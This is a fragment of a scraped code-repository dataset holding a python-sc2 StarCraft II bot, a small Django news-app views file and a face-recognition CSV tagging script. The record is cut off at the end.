"text": "# coding=utf-8\nimport os\nimport glob\nimport os\nimport stat\nimport openpyxl\nfrom openpyxl.styles import Font, PatternFill, Border, Alignment, Side\nfrom copy import copy, deepcopy\n\ntitlecolor = PatternFill(fill_type='solid',\n\t\t\t\t\t\tstart_color='FF0000',\n\t\t\t\t\t\tend_color='FF0000')\ntitlefont = Font(size=15,\n\t\t\t\tcolor='FFFFFF')\n\ncellalignment = Alignment(horizontal='center',\n\t\t\t\t\t\t\tvertical='center')\n\nsecondcolor = PatternFill(fill_type='solid',\n\t\t\t\t\t\t\tstart_color='000000',\n\t\t\t\t\t\t\tend_color='000000')\n\nsecondfont = Font(color='FFFFFF')\n\ncellcolor = PatternFill(fill_type='lightGrid',\n\t\t\t\t\t \tstart_color='FFFFFF',\n\t\t\t\t\t \tend_color='FFFFFF')\n\nthin_border = Border(left=Side(style='thin'), \n right=Side(style='thin'), \n top=Side(style='thin'), \n bottom=Side(style='thin'))\n\n\ndef CopyCoreBlock(oldrow,newrow):\n\tfor i in range (0,17):\n\n\t\tif i <= 1:\n\t\t\tnewexcel.merge_cells(start_row=newrow+i,start_column=1, end_row=newrow+i, end_column=3)\n\t\t\tnewexcel.row_dimensions[newrow+i].height=20\n\t\tif '10.192' in oldexcel.cell(row=oldrow+i,column=1).value:\n\t\t\tprint oldexcel.cell(row=oldrow+i,column=1).value\n\t\tnewexcel.cell(row=newrow+i,column=1).value=oldexcel.cell(row=oldrow+i,column=1).value\n\t\tnewexcel.cell(row=newrow+i,column=1).font=oldexcel.cell(row=oldrow+i,column=1).font.copy()\n\t\tnewexcel.cell(row=newrow+i,column=1).fill=oldexcel.cell(row=oldrow+i,column=1).fill.copy()\n\t\tnewexcel.cell(row=newrow+i,column=1).border=oldexcel.cell(row=oldrow+i,column=1).border.copy()\n\t\tnewexcel.cell(row=newrow+i,column=1).alignment=oldexcel.cell(row=oldrow+i,column=1).alignment.copy()\n\n\t\tnewexcel.cell(row=newrow+i,column=2).value=oldexcel.cell(row=oldrow+i,column=2).value\n\t\tnewexcel.cell(row=newrow+i,column=2).font=oldexcel.cell(row=oldrow+i,column=1).font.copy()\n\t\tnewexcel.cell(row=newrow+i,column=2).fill=oldexcel.cell(row=oldrow+i,column=1).fill.copy()\n\t\tnewexcel.cell(row=newrow+i,column=2).border=oldexcel.cell(row=oldrow+i,column=1).border.copy()\n\t\tnewexcel.cell(row=newrow+i,column=2).alignment=oldexcel.cell(row=oldrow+i,column=1).alignment.copy()\n\n\t\tnewexcel.cell(row=newrow+i,column=3).value=oldexcel.cell(row=oldrow+i,column=3).value\n\t\tnewexcel.cell(row=newrow+i,column=3).font=oldexcel.cell(row=oldrow+i,column=1).font.copy()\n\t\tnewexcel.cell(row=newrow+i,column=3).fill=oldexcel.cell(row=oldrow+i,column=1).fill.copy()\n\t\tnewexcel.cell(row=newrow+i,column=3).border=oldexcel.cell(row=oldrow+i,column=1).border.copy()\n\t\tnewexcel.cell(row=newrow+i,column=3).alignment=oldexcel.cell(row=oldrow+i,column=1).alignment.copy()\n\n\t\t# newexcel.cell(row=newrow+i,column=4).value=oldexcel.cell(row=oldrow+i,column=4).value\n\t\t# newexcel.cell(row=newrow+i,column=4).font=oldexcel.cell(row=oldrow+i,column=1).font.copy()\n\t\t# newexcel.cell(row=newrow+i,column=4).fill=oldexcel.cell(row=oldrow+i,column=1).fill.copy()\n\t\t# newexcel.cell(row=newrow+i,column=4).border=oldexcel.cell(row=oldrow+i,column=1).border.copy()\n\t\t# newexcel.cell(row=newrow+i,column=4).alignment=oldexcel.cell(row=oldrow+i,column=1).alignment.copy()\n\treturn newrow+i\n\n\nprint 'Starting...'\nprint\nwbold=openpyxl.load_workbook(\"OID_Guatemala.xlsx\")\noldexcel=wbold.get_sheet_by_name(\"Sheet1\")\nwbnew=openpyxl.load_workbook(\"OID_Guatemala_Core-MPLS.xlsx\")\nnewexcel=wbnew.get_sheet_by_name(\"Sheet1\")\n\ninvalid=0\norirow=1\nformatrow=1\ncounter=1\noldtitle=''\nwhile orirow < oldexcel.max_row:\n\tif 
oldexcel.cell(row=orirow,column=1).value is None:\n\t\tinvalid+=1\n\telif 'Core-MPLS' in oldexcel.cell(row=orirow,column=1).value:\n\t\tif oldtitle!=oldexcel.cell(row=orirow-1,column=1).value:\n\t\t\tformatrow+=5\n\t\tformatrow=CopyCoreBlock(orirow-1,formatrow)\n\t\tprint 'Original Row =%s, Equipment Counter=%s, New Row=%s' % (orirow,counter,formatrow)\n\t\toldtitle=oldexcel.cell(row=orirow-1,column=1).value\n\n\n\t\tformatrow+=1\n\t\tcounter+=1\n\torirow+=1\n\n\n\n\n\n\n\nprint oldtitle\nprint 'Writing to Excel File'\nwbnew.save('OID_Guatemala_Core-MPLS.xlsx')\n\n"
}
] | 5 |
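A note on the openpyxl pattern used in the style-copying script above: each cell's value and style attributes are carried over one by one. Below is a minimal, self-contained sketch of that pattern (the throwaway workbook and the copy_cell helper are illustrative, not from the script; newer openpyxl versions prefer copy() from the standard library over the deprecated .copy() method on style objects):

import openpyxl
from copy import copy

def copy_cell(src_ws, dst_ws, src_row, dst_row, col):
    # Copy one cell's value plus its style attributes between worksheets.
    src = src_ws.cell(row=src_row, column=col)
    dst = dst_ws.cell(row=dst_row, column=col)
    dst.value = src.value
    dst.font = copy(src.font)        # copy() avoids sharing mutable style state
    dst.fill = copy(src.fill)
    dst.border = copy(src.border)
    dst.alignment = copy(src.alignment)

wb = openpyxl.Workbook()             # throwaway workbook, for illustration only
ws = wb.active
ws.cell(row=1, column=1).value = 'demo'
copy_cell(ws, ws, src_row=1, dst_row=2, col=1)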
eddycwp/LakersBot | https://github.com/eddycwp/LakersBot | 0365289a9bfa7721436dc3d684084116da32ff1e | dc2443f89adf2305bdc688d8b7294f686869b108 | 0fb3335b06921383c4fec64b2bbc7928bfdf8092 | refs/heads/master | 2020-06-12T06:44:46.106563 | 2019-06-28T06:21:43 | 2019-06-28T06:21:43 | 194,223,260 | 0 | 0 | null | 2019-06-28T06:53:38 | 2019-06-28T06:21:45 | 2019-06-28T06:21:43 | null | [
{
"alpha_fraction": 0.5791446566581726,
"alphanum_fraction": 0.5897499322891235,
"avg_line_length": 46.701175689697266,
"blob_id": "51df1e1750e0b1a5349e55469572faf388aee785",
"content_id": "d8abea765939868481a177024129a67d9494dc6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21069,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 425,
"path": "/LakersBot.py",
"repo_name": "eddycwp/LakersBot",
"src_encoding": "UTF-8",
"text": "import random\n\nimport sc2\nfrom sc2 import Race, Difficulty\nfrom sc2.constants import *\nfrom sc2.player import Bot, Computer\nfrom sc2.player import Human\nfrom sc2 import BotAI\n\nimport time\nimport math\n\n\nclass Lakers(sc2.BotAI):\n def __init__(self, use_model=True):\n self.combinedActions = []\n self.enemy_expand_location = None\n self.first_supply_built=False\n #self.stage = \"early_rush\"\n self.counter_units = {\n #Enemy: [Enemy_Cunts, Army, Num]\n MARINE: [3, SIEGETANK, 1],\n MARAUDER: [3, MARINE, 3],\n REAPER: [3, SIEGETANK, 3],\n GHOST: [2, MARINE, 3],\n SIEGETANK: [1, BANSHEE, 1],\n BANSHEE: [1, MARINE, 3]\n }\n self.is_defend_rush = False\n self.defend_around = [COMMANDCENTER, SUPPLYDEPOT, SENSORTOWER, MISSILETURRET, BARRACKS, FACTORY]\n self.is_worker_rush = False\n self.attack_round = 0\n self.warmup = 1\n self.Army = []\n self.need_counter_attack = False\n\n async def on_step(self, iteration):\n await self.command_center(iteration)\n\n # Start\n async def command_center(self, iteration):\n await self.defend_rush(iteration)\n\n ############### 修建筑 ####################\n cc1 = self.units(COMMANDCENTER).ready\n if not cc1.exists:\n await self.worker_rush(iteration)\n return\n else:\n cc1 = cc1.first\n await self.build_SUPPLYDEPOT(cc1) # 修建补给站\n await self.build_BARRACKS(cc1) # 修建兵营\n await self.build_REFINERY(cc1) # 修建精炼厂\n await self.build_FACTORY(cc1) # 修建重工厂\n await self.build_STARPORT(cc1) # 修建星港\n\n ccs = self.units(COMMANDCENTER).ready\n if ccs.amount == 2:\n cc1 = ccs[0]\n cc2 = ccs[1]\n\n await self.build_ENGINEERINGBAY(cc1) # 修建工程站\n await self.build_SENSORTOWER(cc1) # 修建感应塔\n await self.build_MISSILETURRET(cc1) # 修建导弹他\n\n await self.build_SUPPLYDEPOT(cc2) # 修建补给站\n await self.build_BARRACKS(cc2) # 修建兵营\n await self.build_REFINERY(cc2) # 修建精炼厂\n await self.build_FACTORY(cc2) # 修建重工厂\n await self.build_STARPORT(cc2) # 修建星港\n await self.build_ENGINEERINGBAY(cc2) # 修建工程站\n await self.build_SENSORTOWER(cc2) # 修建感应塔\n await self.build_MISSILETURRET(cc2) # 修建导弹他\n\n ccs = self.units(COMMANDCENTER).ready\n if ccs.amount == 3:\n cc3 = ccs[2]\n await self.build_SUPPLYDEPOT(cc3) # 修建补给站\n await self.build_BARRACKS(cc3) # 修建兵营\n await self.build_REFINERY(cc3) # 修建精炼厂\n await self.build_FACTORY(cc3) # 修建重工厂\n await self.build_STARPORT(cc3) # 修建星港\n await self.build_ENGINEERINGBAY(cc3) # 修建工程站\n await self.build_SENSORTOWER(cc3) # 修建感应塔\n await self.build_MISSILETURRET(cc3) # 修建导弹他\n await self.build_GHOSTACADEMY(cc3) # 修建幽灵学院\n await self.build_BUNKER(cc3) # 修建地堡\n\n if self.units(COMMANDCENTER).ready.amount > 3:\n for cc in self.units(COMMANDCENTER).ready:\n await self.build_SUPPLYDEPOT(cc) # 修建补给站\n await self.build_BARRACKS(cc) # 修建兵营\n await self.build_REFINERY(cc) # 修建精炼厂\n await self.build_FACTORY(cc) # 修建重工厂\n await self.build_STARPORT(cc) # 修建星港\n await self.build_ENGINEERINGBAY(cc) # 修建工程站\n await self.build_SENSORTOWER(cc) # 修建感应塔\n await self.build_MISSILETURRET(cc) # 修建导弹他\n await self.build_GHOSTACADEMY(cc) # 修建幽灵学院\n await self.build_BUNKER(cc) # 修建地堡\n\n ################ 采矿 ######################\n #if not self.is_worker_rush:\n await self.distribute_workers()\n for a in self.units(REFINERY):\n if a.assigned_harvesters < a.ideal_harvesters:\n w = self.workers.closer_than(20, a)\n if w.exists:\n await self.do(w.random.gather(a))\n\n ################ 训练 ######################\n if self.units(COMMANDCENTER).ready.amount ==1 or (self.units(COMMANDCENTER).ready.amount > 1 and self.attack_round > self.warmup):\n for cc in 
self.units(COMMANDCENTER).ready:\n await self.train_WORKERS(cc) # 训练农民\n\n await self.train_MARINE(10) # 训练机枪兵\n await self.train_BANSHEE(2) # 训练女妖战机\n\n if self.attack_round >= self.warmup:\n await self.train_SIEGETANK(5) # 训练坦克\n\n if self.units(COMMANDCENTER).ready.amount > 2:\n await self.train_MARAUDER(5) # 训练掠夺者\n await self.train_REAPER(5) # 训练收割者\n await self.train_GHOST(2) # 训练幽灵\n\n ############### 扩张 ######################\n await self.expand_command_center(iteration)\n\n ############### 进攻 ###################\n # 前三轮主动进攻:机枪兵大于10个,女妖大于3,进攻\n if self.attack_round < self.warmup:\n if self.units(MARINE).amount >= 10 and self.units(BANSHEE).amount >= 2:\n for ma in self.units(MARINE).random_group_of(10):\n await self.do(ma.attack(self.enemy_start_locations[0]))\n for bs in self.units(BANSHEE).random_group_of(2):\n await self.do(bs.attack(self.enemy_start_locations[0]))\n self.attack_round += 1\n else:\n if self.units(MARINE).amount >= 20 and self.units(BANSHEE).amount >= 10:\n for ma in self.units(MARINE).random_group_of(20):\n await self.do(ma.attack(self.enemy_start_locations[0]))\n for bs in self.units(BANSHEE).random_group_of(10):\n await self.do(bs.attack(self.enemy_start_locations[0]))\n\n # 探测和策略调整\n #await self.strategy(iteration)\n\n async def strategy(self, iteration):\n #print(\"Detect and adjustment.\")\n await self.worker_detect(iteration)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is MARINE).amount >= 5:\n self.Army.append(SIEGETANK)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is BANSHEE).amount >= 2:\n self.Army.append(GHOST)\n self.Army.append(MARINE)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is MARAUDER).amount >= 2:\n self.Army.append(MARINE)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is GHOST).amount >= 2:\n self.Army.append(BANSHEE)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is SIEGETANK).amount >= 2:\n self.Army.append(BANSHEE)\n self.Army.append(MARINE)\n\n ############ 功能函数 ################\n async def worker_rush(self, iteration):\n self.actions = []\n target = self.enemy_start_locations[0]\n if iteration == 0:\n print(\"We will bring you glory!!\")\n for worker in self.workers:\n self.actions.append(worker.attack(target))\n await self.do_actions(self.actions)\n\n async def worker_detect(self, iteration):\n self.actions = []\n target = self.enemy_start_locations[0]\n if iteration != 0 and iteration / 500 == 0:\n for worker in self.workers:\n self.actions.append(worker.attack(target))\n break\n await self.do_actions(self.actions)\n\n async def marine_detect(self, iteration):\n self.actions = []\n target = self.enemy_start_locations[0]\n if iteration != 0 and iteration / 10 == 0:\n for unit in self.units(MARINE):\n self.actions.append(unit.attack(target))\n break\n await self.do_actions(self.actions)\n\n async def train_WORKERS(self, cc):\n for cc in self.units(COMMANDCENTER).ready.noqueue:\n workers = len(self.units(SCV).closer_than(15, cc.position))\n minerals = len(self.state.mineral_field.closer_than(15, cc.position))\n if minerals > 4:\n if workers < 18:\n if self.can_afford(SCV):\n await self.do(cc.train(SCV))\n\n async def build_SUPPLYDEPOT(self, cc):\n if self.supply_left <= 3 and self.can_afford(SUPPLYDEPOT) and not self.already_pending(SUPPLYDEPOT): # and not self.first_supply_built:\n await self.build(SUPPLYDEPOT, near = cc.position.towards(self.game_info.map_center, 20))\n\n async def build_BARRACKS(self, cc):\n if self.units(BARRACKS).amount == 0 and 
self.can_afford(BARRACKS):\n await self.build(BARRACKS, near = cc.position.towards(self.game_info.map_center, 20))\n if self.units(BARRACKS).amount < self.units(COMMANDCENTER).amount * 2 and self.units(FACTORY).ready.exists and self.can_afford(BARRACKS):\n await self.build(BARRACKS, near = cc.position.towards(self.game_info.map_center, 20))\n #if self.units(BARRACKS).amount < 2 and self.units(STARPORT).ready.exists and self.can_afford(BARRACKS):\n # await self.build(BARRACKS, near = cc.position.towards(self.game_info.map_center, 20))\n\n async def build_FACTORY(self, cc):\n if self.units(FACTORY).amount < self.units(COMMANDCENTER).amount and self.units(BARRACKS).ready.exists and self.can_afford(FACTORY) and not self.already_pending(FACTORY):\n await self.build(FACTORY, near = cc.position.towards(self.game_info.map_center, 10))\n # 修建 FACTORYTECHLAB, 以建造坦克\n for sp in self.units(FACTORY).ready:\n if sp.add_on_tag == 0:\n await self.do(sp.build(FACTORYTECHLAB))\n\n async def build_STARPORT(self, cc):\n if self.units(STARPORT).amount < self.units(COMMANDCENTER).amount and self.units(FACTORY).ready.exists and self.can_afford(STARPORT) and not self.already_pending(STARPORT):\n await self.build(STARPORT, near = cc.position.towards(self.game_info.map_center, 5))\n # 修建 STARPORTTECHLAB, 以训练女妖\n for sp in self.units(STARPORT).ready:\n if sp.add_on_tag == 0:\n await self.do(sp.build(STARPORTTECHLAB))\n\n async def build_ENGINEERINGBAY(self, cc):\n if self.units(ENGINEERINGBAY).amount < self.units(COMMANDCENTER).amount and self.can_afford(ENGINEERINGBAY) and not self.already_pending(ENGINEERINGBAY):\n await self.build(ENGINEERINGBAY, near = cc.position.towards(self.game_info.map_center, 25))\n\n async def build_SENSORTOWER(self, cc):\n if self.units(SENSORTOWER).amount < 2 * self.units(COMMANDCENTER).amount and self.units(ENGINEERINGBAY).ready.exists and self.can_afford(SENSORTOWER) and not self.already_pending(SENSORTOWER):\n await self.build(SENSORTOWER, near = cc.position.towards(self.game_info.map_center, 5))\n\n async def build_MISSILETURRET(self, cc):\n if self.units(MISSILETURRET).amount < 2 * self.units(COMMANDCENTER).amount and self.units(SENSORTOWER).ready.exists and self.can_afford(MISSILETURRET) and not self.already_pending(MISSILETURRET):\n await self.build(MISSILETURRET, near = cc.position.towards(self.game_info.map_center, 5))\n await self.build(MISSILETURRET, near=self.find_ramp_corner(cc))\n\n async def build_GHOSTACADEMY(self, cc):\n if self.units(GHOSTACADEMY).amount < self.units(COMMANDCENTER).amount and self.units(FACTORY).ready.exists and self.can_afford(GHOSTACADEMY) and not self.already_pending(GHOSTACADEMY):\n await self.build(GHOSTACADEMY, near = cc.position.towards(self.game_info.map_center, 9))\n\n async def build_BUNKER(self, cc):\n if self.units(BUNKER).amount < 2 * self.units(COMMANDCENTER).amount and self.units(GHOSTACADEMY).ready.exists and self.can_afford(BUNKER) and not self.already_pending(BUNKER):\n await self.build(BUNKER, near = cc.position.towards(self.game_info.map_center, 5))\n\n async def build_REFINERY(self, cc):\n if self.units(BARRACKS).exists and self.units(REFINERY).amount < self.units(COMMANDCENTER).amount * 2 and self.can_afford(REFINERY) and not self.already_pending(REFINERY):\n vgs = self.state.vespene_geyser.closer_than(20.0, cc)\n for vg in vgs:\n if self.units(REFINERY).closer_than(1.0, vg).exists:\n break\n worker = self.select_build_worker(vg.position)\n if worker is None:\n break\n await self.do(worker.build(REFINERY, vg))\n break\n\n def 
find_ramp_corner(self, cc):\n ramp = self.main_base_ramp.corner_depots\n cm = self.units(COMMANDCENTER)\n ramp = {d for d in ramp if cm.closest_distance_to(d) > 1}\n return ramp.pop()\n\n def get_the_front_cc(self):\n ccs = self.units(COMMANDCENTER).ready\n return ccs[self.units(COMMANDCENTER).ready.amount - 1]\n\n # 训练机枪兵\n async def train_MARINE(self, number):\n if self.units(MARINE).idle.amount < number:\n for barrack in self.units(BARRACKS).ready.noqueue:\n if self.can_afford(MARINE):\n await self.do(barrack.train(MARINE))\n for mr in self.units(MARINE).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练掠夺者\n async def train_MARAUDER(self, number):\n if self.units(MARAUDER).idle.amount < number and self.can_afford(MARAUDER):\n for marauder in self.units(BARRACKS).ready:\n await self.do(marauder.train(MARAUDER))\n for mr in self.units(MARAUDER).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练收割者\n async def train_REAPER(self, number):\n if self.units(REAPER).idle.amount < number and self.can_afford(REAPER):\n for re in self.units(BARRACKS).ready:\n await self.do(re.train(REAPER))\n for mr in self.units(REAPER).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练幽灵\n async def train_GHOST(self, number):\n if self.units(GHOST).idle.amount < number and self.can_afford(GHOST):\n for gst in self.units(GHOSTACADEMY).ready:\n await self.do(gst.train(GHOST))\n for mr in self.units(GHOST).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练坦克\n async def train_SIEGETANK(self, number):\n if self.units(SIEGETANK).idle.amount < number and self.can_afford(SIEGETANK):\n for st in self.units(FACTORY).ready:\n await self.do(st.train(SIEGETANK))\n for mr in self.units(SIEGETANK).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练女妖战机\n async def train_BANSHEE(self, number):\n if self.units(BANSHEE).idle.amount < number:\n for bs in self.units(STARPORT).ready:\n if self.can_afford(BANSHEE):\n await self.do(bs.train(BANSHEE))\n for mr in self.units(BANSHEE).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n async def defend_rush(self, iteration):\n # 如果兵力小于15,认为是前期的rush\n if iteration < 800 and (len(self.units(MARINE)) + len(self.units(REAPER)) + len(self.units(MARAUDER)) < 15 and self.known_enemy_units) or self.is_defend_rush:\n threats = []\n for structure_type in self.defend_around:\n for structure in self.units(structure_type):\n threats += self.known_enemy_units.closer_than(11, structure.position)\n if len(threats) > 0:\n break\n if len(threats) > 0:\n break\n\n # 如果有7个及以上的威胁,调动所有农民防守,如果有机枪兵也投入防守\n if len(threats) >= 7:\n self.attack_round += 1\n self.is_defend_rush = True\n self.need_counter_attack = True\n defence_target = threats[0].position.random_on_distance(random.randrange(1, 3))\n for pr in self.units(SCV):\n self.combinedActions.append(pr.attack(defence_target))\n for ma in self.units(MARINE).random_group_of(round(len(self.units(MARINE)) / 2)):\n self.combinedActions.append(ma.attack(defence_target))\n\n # 如果有2-6个威胁,调动一半农民防守,如果有机枪兵也投入防守\n elif 1 < len(threats) < 7:\n self.attack_round += 1\n self.is_defend_rush = True\n defence_target = threats[0].position.random_on_distance(random.randrange(1, 3))\n self.scv1 = self.units(SCV).random_group_of(round(len(self.units(SCV)) / 2))\n for scv in self.scv1:\n self.combinedActions.append(scv.attack(defence_target))\n for ma in 
self.units(MARINE).random_group_of(round(len(self.units(MARINE)) / 2)):\n self.combinedActions.append(ma.attack(defence_target))\n\n # 只有一个威胁,视为骚扰,调动一个农民防守\n elif len(threats) == 1 and not self.is_defend_rush:\n self.is_defend_rush = True\n defence_target = threats[0].position.random_on_distance(random.randrange(1, 3))\n self.scv2 = self.units(SCV).random_group_of(2)\n for scv in self.scv2:\n self.combinedActions.append(scv.attack(defence_target))\n\n elif len(threats) == 0 and self.is_defend_rush:\n # 继续采矿\n for worker in self.workers:\n closest_mineral_patch = self.state.mineral_field.closest_to(worker)\n self.combinedActions.append(worker.gather(closest_mineral_patch))\n\n # 小规模防守反击\n if self.need_counter_attack:\n self.need_counter_attack = False\n if self.units(MARINE).amount > 5:\n self.ca_ma = self.units(MARINE).random_group_of(5)\n for ma in self.ca_ma:\n self.combinedActions.append(ma.attack(self.enemy_start_locations[0]))\n if self.units(BANSHEE).amount > 2:\n self.ca_bs = self.units(BANSHEE).random_group_of(2)\n for bs in self.ca_bs:\n self.combinedActions.append(bs.attack(self.enemy_start_locations[0]))\n\n self.is_worker_rush = False\n self.is_defend_rush = False\n await self.do_actions(self.combinedActions)\n else:\n self.is_worker_rush = False\n self.is_defend_rush = False\n # 继续采矿\n for worker in self.workers.idle:\n closest_mineral_patch = self.state.mineral_field.closest_to(worker)\n self.combinedActions.append(worker.gather(closest_mineral_patch))\n\n async def expand_command_center(self, iteration):\n #if self.units(COMMANDCENTER).exists and (iteration > self.units(COMMANDCENTER).amount * 1500) and self.can_afford(COMMANDCENTER):\n if self.units(COMMANDCENTER).exists and (self.attack_round > self.warmup or iteration > self.units(COMMANDCENTER).amount * 1500) and self.can_afford(COMMANDCENTER):\n location = await self.get_next_expansion()\n await self.build(COMMANDCENTER, near=location, max_distance=10, random_alternative=False, placement_step=1)\n\nclass WorkerRushBot(BotAI):\n def __init__(self):\n super().__init__()\n self.actions = []\n\n async def on_step(self, iteration):\n self.actions = []\n\n if iteration == 5000:\n target = self.enemy_start_locations[0]\n\n for worker in self.workers:\n self.actions.append(worker.attack(target))\n\n await self.do_actions(self.actions)\n\ndef main():\n sc2.run_game(sc2.maps.get(\"PortAleksanderLE\"), [\n Bot(Race.Terran, Lakers()),\n #Bot(Race.Terran, WorkerRushBot())\n Computer(Race.Terran, Difficulty.Hard)\n #Human(Race.Terran)\n ], realtime=False)\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7674418687820435,
"alphanum_fraction": 0.7906976938247681,
"avg_line_length": 20.5,
"blob_id": "9c3bacc42b68cd5a1b42960b33c3733c53ea1216",
"content_id": "92a0a3eb588418b0789e4f32a015bca8123ef7fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 43,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 2,
"path": "/README.md",
"repo_name": "eddycwp/LakersBot",
"src_encoding": "UTF-8",
"text": "# LakersBot\nSimple bot based on python-sc2\n"
}
] | 2 |
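The counter_units table in Lakers.__init__ encodes "once N enemies of type X are seen, train M units of type Y", but nothing in on_step reads it. A plain-Python sketch of how such a table could be consulted (unit names are strings here instead of the sc2 constants, purely for illustration):

counter_units = {
    # enemy: (count threshold, counter unit, how many to train)
    'MARINE':  (3, 'SIEGETANK', 1),
    'BANSHEE': (1, 'MARINE', 3),
}

def counters_for(enemy_counts):
    # enemy_counts maps unit name -> observed count; returns training orders
    orders = []
    for enemy, (threshold, counter, n) in counter_units.items():
        if enemy_counts.get(enemy, 0) >= threshold:
            orders.append((counter, n))
    return orders

print(counters_for({'MARINE': 5}))  # -> [('SIEGETANK', 1)]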
Django-Rabi/Local_repo | https://github.com/Django-Rabi/Local_repo | 69a5ac099a5da70dfcfd4a20f1ed4b58ebf14e05 | ba53cb442264e15b2ca2a7507556c921cea6369c | bb3190718166c411aa38841a260cf4f762af4a8a | refs/heads/master | 2023-07-05T19:14:14.593429 | 2021-09-03T11:44:16 | 2021-09-03T11:44:16 | 402,749,599 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6818980574607849,
"alphanum_fraction": 0.7082601189613342,
"avg_line_length": 38.24137878417969,
"blob_id": "c365489972a711e230ac375b5c34a917d8408324",
"content_id": "ad0d3c33fd2161ecb710f015a96e201bfa24e510",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1138,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 29,
"path": "/Demo11_Rabi_News_Project/newsApp/views.py",
"repo_name": "Django-Rabi/Local_repo",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\ndef index(request):\n return render(request,'newsApp/index.html')\n\ndef moviesinfo(request):\n head_msg='Latest Movie Information'\n msg1='Sonali slowly getting cured'\n msg2='Salman going to marriage soon'\n msg3='Narendra Modi is going to act in some movie'\n my_dict={'head_msg':head_msg,'msg1':msg1,'msg2':msg2,'msg3':msg3}\n return render(request,'newsApp/news.html',context=my_dict)\n\ndef sportsinfo(request):\n head_msg='Latest Sports Information'\n msg1='Anushka Sharma Firing Like anything'\n msg2='Kohli updating in game anything can happend'\n msg3='India Performance not upto the mark in asian Games'\n my_dict={'head_msg':head_msg,'msg1':msg1,'msg2':msg2,'msg3':msg3}\n return render(request,'newsApp/news.html',context=my_dict)\n\ndef politicsinfo(request):\n head_msg='Latest Politcs Information'\n msg1='Achhce Din Aaa gaya'\n msg2='Rupee Value now 1$:70Rs'\n msg3='In India Single Paisa Black money No more'\n my_dict={'head_msg':head_msg,'msg1':msg1,'msg2':msg2,'msg3':msg3}\n return render(request,'newsApp/news.html',context=my_dict)\n"
}
] | 1 |
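The three category views in newsApp/views.py differ only in their headline strings. One possible consolidation, sketched with placeholder headlines and a hypothetical category URL parameter (the app's URLconf would need a matching route; none of these names come from the repository):

from django.shortcuts import render

NEWS = {
    'movies':   ('Latest Movie Information',    ['headline 1', 'headline 2', 'headline 3']),
    'sports':   ('Latest Sports Information',   ['headline 1', 'headline 2', 'headline 3']),
    'politics': ('Latest Politics Information', ['headline 1', 'headline 2', 'headline 3']),
}

def newsinfo(request, category):
    head_msg, msgs = NEWS[category]
    my_dict = {'head_msg': head_msg, 'msg1': msgs[0], 'msg2': msgs[1], 'msg3': msgs[2]}
    return render(request, 'newsApp/news.html', context=my_dict)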
HoboQian/face_recognize | https://github.com/HoboQian/face_recognize | 46258b507cd89cc03d369b5c7d7069fb07c1ed04 | 5e03779b5109527ddc92d4a8c051059dd6070e88 | 9c98db93469dc1662de93b4b123c7669d9b005c3 | refs/heads/master | 2021-05-04T00:14:16.115200 | 2018-03-01T05:41:53 | 2018-03-01T05:41:53 | 120,408,734 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5351933836936951,
"alphanum_fraction": 0.540900468826294,
"avg_line_length": 28.960784912109375,
"blob_id": "36b9f63d4530299600154cc97c75d8a5c38bd8f7",
"content_id": "a90ea461f9b4c24e9cab7ac6acee5befaabd62a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 51,
"path": "/Add_Tag_IN_CSV_FILE.py",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "import sys\r\nimport os\r\nimport glob\r\n\r\n# -*- coding: utf-8 -*-\r\nauthor__ = 'hobo'\r\n\r\nFILE_PATH = 'F:/Work_File_share/Face_Recognize_hobo/raw/'\r\nFILE_NAME = 'train_data.txt'\r\nGENERATE_FILE_NAME = 'csv.txt'\r\nCOMPLETE_RAW_FILE_PATH = FILE_PATH + FILE_NAME\r\nCOMPLETE_GENERATE_FILE_PATH = FILE_PATH + GENERATE_FILE_NAME\r\n\r\ndef add_tag_in_csv_file():\r\n raw_file = open(COMPLETE_RAW_FILE_PATH, 'r')\r\n generate_file = open(COMPLETE_GENERATE_FILE_PATH, 'a+')\r\n\r\n if raw_file is None:\r\n print ('ERROR: RAW file can not been opened.')\r\n return\r\n\r\n NAME = '' # used to distinguish name\r\n TAG_NUM = -1\r\n for line in raw_file:\r\n line1 = line.replace('\\\\', '/')\r\n line2 = line1.replace(FILE_PATH, './at/')\r\n temp = line2.split('/')\r\n temp_name = temp[2] # get the file name\r\n if temp_name != NAME:\r\n NAME = temp_name\r\n TAG_NUM = TAG_NUM + 1\r\n replace_str = ';' + str(TAG_NUM) + '\\n' # let the string together\r\n generate_file.write(line2.replace('\\n', replace_str))\r\n\r\n raw_file.close()\r\n generate_file.close()\r\n\r\ndef generate_csv_file():\r\n print ('NEED IMPLEMENTED LATER.')\r\n # glob.glob(\"F:/Work_File_share/Face_Recognize_hobo/raw/*/*.jpg\")\r\n # os.system('dir / b / s *.bmp > at.txt')\r\n\r\ndef main():\r\n print ('First we wille generate csv file:')\r\n generate_csv_file()\r\n print (\"Now, add tag in csv file.\")\r\n add_tag_in_csv_file()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()"
},
{
"alpha_fraction": 0.7533039450645447,
